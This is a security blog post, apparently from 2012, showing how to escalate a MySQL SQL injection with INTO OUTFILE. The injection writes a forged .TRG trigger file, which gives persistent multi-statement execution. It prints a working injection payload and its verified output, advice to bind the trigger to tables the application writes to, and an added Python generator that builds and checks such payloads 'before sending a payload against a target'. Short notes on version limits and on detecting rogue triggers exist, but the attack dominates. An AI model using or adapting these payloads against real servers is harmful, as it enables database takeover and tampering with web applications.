

MySQL Stacked Queries with SQL Injection - Web Security

By superhei, 2012-06-04

I first saw this technique on wisec back in 2010: http://www.wisec.it/sectou.php?id=4bced661462bd . I never got around to testing it at the time; today I tried it out, so here are my notes :)

The scenario it fits is a web application and database on separate hosts, where the database account has the FILE privilege to write files and there is an injection point. Specifically:

1. The account the web application uses to connect to the database has the FILE privilege.
2. An injection point that is not subject to magic quotes (the payload depends on unescaped single quotes).
3. The web server and the database are on separate hosts. If they were on the same host you could simply write a webshell to the web root instead :)

Effect: multi-statement execution. A SELECT-only injection can be turned into UPDATE, INSERT and other statements, which in turn may let a second-order vulnerability be exploited for a much larger impact on the web application.

Test procedure:

A local table:

mysql> desc aa.article;
+-----------+--------------+------+-----+---------+----------------+
| Field     | Type         | Null | Key | Default | Extra          |
+-----------+--------------+------+-----+---------+----------------+
| articleid | int(11)      | NO   | PRI | NULL    | auto_increment |
| title     | varchar(100) | NO   |     |         |                |
| content   | text         | NO   |     | NULL    |                |
+-----------+--------------+------+-----+---------+----------------+
3 rows in set (0.01 sec)

The statement executed (the UNION puts TYPE=TRIGGERS in the last column, and the rest of the .TRG file is smuggled in through LINES TERMINATED BY; note the two levels of escaping, one for the SQL string literal and one for the quoted values inside the .TRG file):

select * from article where articleid=3 and 1=2 union select null,null,'TYPE=TRIGGERS' into outfile '/var/lib/mysql/aa/article.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nselect 1111 into outfile \\\'/tmp/aa.txt\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';

mysql> select * from article where articleid=3 and 1=2 union select null,null,'TYPE=TRIGGERS' into outfile
    -> '/var/lib/mysql/aa/article.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nselect 1111 into outfile \\\'/tmp/aa.txt\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';
Query OK, 1 row affected (0.04 sec)

The file on disk (the two NULL columns come out as \N, so the first line is "\N<tab>\N<tab>TYPE=TRIGGERS"):

root@ubuntu:/var/lib/mysql/aa# cat article.TRG
\N	\N	TYPE=TRIGGERS
triggers='CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\nbegin\nselect 1111 into outfile \'/tmp/aa.txt\';\nend'
sql_modes=0
definers='root@localhost'
client_cs_names='latin1'
connection_cl_names='latin1_swedish_ci'
db_cl_names='latin1_swedish_ci'
root@ubuntu:/var/lib/mysql/aa# ls /tmp/aa.txt
ls: cannot access /tmp/aa.txt: No such file or directory

Back in the mysql shell:

mysql> insert into article (articleid,title,content) values (20,2,3);
Query OK, 1 row affected (0.00 sec)

Check the file again:

root@ubuntu:/var/lib/mysql/aa# ls /tmp/aa.txt
/tmp/aa.txt
root@ubuntu:/var/lib/mysql/aa# cat /tmp/aa.txt
1111

The trigger body says "on user", yet the insert into article fired it: as the test shows, it is the .TRG file name (article.TRG in the database directory) that binds the trigger to a table, not the ON clause in the definition.

In a real web environment, attach the trigger to a table that the application itself inserts into, deletes from or updates, so that ordinary application traffic fires it :)

Two things to check before relying on this today. Since MySQL 5.7.6 secure_file_priv defaults to a dedicated directory (or to NULL, which disables file export entirely), so INTO OUTFILE can no longer write into the data directory on a default install; and MySQL 8.0 keeps trigger metadata in its transactional data dictionary rather than in .TRG files, so the trick applies to .frm-era servers (MySQL 5.x and MariaDB, which still uses .TRG files). On the defensive side, a trigger that appears in information_schema.TRIGGERS with a DEFINER nobody created, or a stray .TRG file in a database directory, is the artifact to look for.
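The payload above nests two escaping layers, and getting them wrong silently produces a .TRG file mysqld will not load. As an added example, not code from the post or from wisec, the following Python builds the .TRG text from a trigger definition, wraps it in the UNION ... INTO OUTFILE payload exactly as the post's statement does, and parses the resulting file back to confirm the definition mysqld would read. It assumes the .TRG quoting rules mysqld's file parser uses for quoted values (backslash escapes for backslash, newline, NUL, single quote and Ctrl-Z), a sql_mode without NO_BACKSLASH_ESCAPES, and default INTO OUTFILE formatting (tab-separated fields, NULL written as \N). The file reader here is a simplified one written for this example, not mysqld's own; the outfile path, column count and trigger body are the post's.

```python
# Escapes mysqld uses for single-quoted values in <table>.TRG files (assumption,
# matching the file contents shown in the post): \\ \n \0 \' \z
_TRG_ESC = {"\\": "\\\\", "\n": "\\n", "\0": "\\0", "'": "\\'", "\x1a": "\\z"}
_TRG_UNESC = {v[1]: k for k, v in _TRG_ESC.items()}
# Escapes inside a backslash-escaped MySQL string literal (default sql_mode);
# \\ \' \" resolve to the character itself, \% and \_ keep their backslash.
_SQL_UNESC = {"0": "\0", "b": "\b", "n": "\n", "r": "\r", "t": "\t", "Z": "\x1a",
              "%": "\\%", "_": "\\_"}


def _unescape(text: str, table: dict) -> str:
    """Resolve backslash escapes via table; anything else yields the escaped char."""
    out, i = [], 0
    while i < len(text):
        if text[i] == "\\" and i + 1 < len(text):
            out.append(table.get(text[i + 1], text[i + 1]))
            i += 2
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def trg_escape(value: str) -> str:
    """Escape a value for a single-quoted field in a .TRG file."""
    return "".join(_TRG_ESC.get(ch, ch) for ch in value)


def trg_unescape(text: str) -> str:
    return _unescape(text, _TRG_UNESC)


def sql_literal(value: str) -> str:
    """Encode value as a backslash-escaped single-quoted MySQL literal."""
    body = value.replace("\\", "\\\\").replace("'", "\\'")
    return "'" + body.replace("\n", "\\n").replace("\0", "\\0") + "'"


def sql_unescape(body: str) -> str:
    """Decode the inside of a single-quoted literal (what the SQL parser yields)."""
    return _unescape(body, _SQL_UNESC)


def build_trg_body(trigger_sql: str, definer: str = "root@localhost", sql_modes: str = "0",
                   charset: str = "latin1", collation: str = "latin1_swedish_ci") -> str:
    """Text of a <table>.TRG file holding one trigger, with the keys used in the post."""
    return ("TYPE=TRIGGERS\n"
            f"triggers='{trg_escape(trigger_sql)}'\n"
            f"sql_modes={sql_modes}\n"
            f"definers='{trg_escape(definer)}'\n"
            f"client_cs_names='{charset}'\n"
            f"connection_cl_names='{collation}'\n"
            f"db_cl_names='{collation}'\n")


def build_payload(trg_body: str, outfile: str, ncols: int) -> str:
    """UNION suffix that writes trg_body to outfile; ncols = columns of the injected SELECT."""
    first_line, rest = trg_body.split("\n", 1)
    cols = ["null"] * (ncols - 1) + [sql_literal(first_line)]  # TYPE=TRIGGERS in the last column
    return (f" and 1=2 union select {','.join(cols)} into outfile {sql_literal(outfile)}"
            f" lines terminated by {sql_literal(chr(10) + rest)}")


def outfile_content(trg_body: str, ncols: int) -> str:
    """What mysqld writes: each NULL column as \\N plus a tab, then the rest."""
    return "\\N\t" * (ncols - 1) + trg_body


def _parse_values(value: str) -> list:
    """Split a field into its values: 'a' 'b' (quoted) or 0 1 (bare)."""
    items, i = [], 0
    while i < len(value):
        if value[i] == " ":
            i += 1
        elif value[i] == "'":
            j, buf = i + 1, []
            while value[j] != "'":           # an escaped \' inside the value does not end it
                step = 2 if value[j] == "\\" else 1
                buf.append(value[j:j + step])
                j += step
            items.append(trg_unescape("".join(buf)))
            i = j + 1
        else:
            j = value.find(" ", i)
            j = len(value) if j < 0 else j
            items.append(value[i:j])
            i = j
    return items


def parse_trg(content: str) -> dict:
    """Simplified reader for the key=value .TRG format (not mysqld's parser).
    Tolerates the \\N<tab> prefix the UNION leaves before TYPE=TRIGGERS, as in the post."""
    lines = content.split("\n")
    if not lines[0].endswith("TYPE=TRIGGERS"):
        raise ValueError("not a TRIGGERS file")
    parsed = {}
    for line in lines[1:]:
        if line:
            key, _, value = line.partition("=")
            parsed[key] = _parse_values(value)
    return parsed


# Constructed sample: the trigger body from the post.
EXAMPLE_TRIGGER = ("CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\n"
                   "begin\nselect 1111 into outfile '/tmp/aa.txt';\nend")

if __name__ == "__main__":
    body = build_trg_body(EXAMPLE_TRIGGER)
    print(build_payload(body, "/var/lib/mysql/aa/article.TRG", ncols=3))
    print(parse_trg(outfile_content(body, ncols=3))["triggers"][0])
```

Running the module prints a payload identical in structure to the post's statement (the `\\n` and `\\\'` sequences are the .TRG escapes re-escaped for the SQL literal), and parsing the simulated file gives back the original trigger text, which is the check to run before sending a payload against a target.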

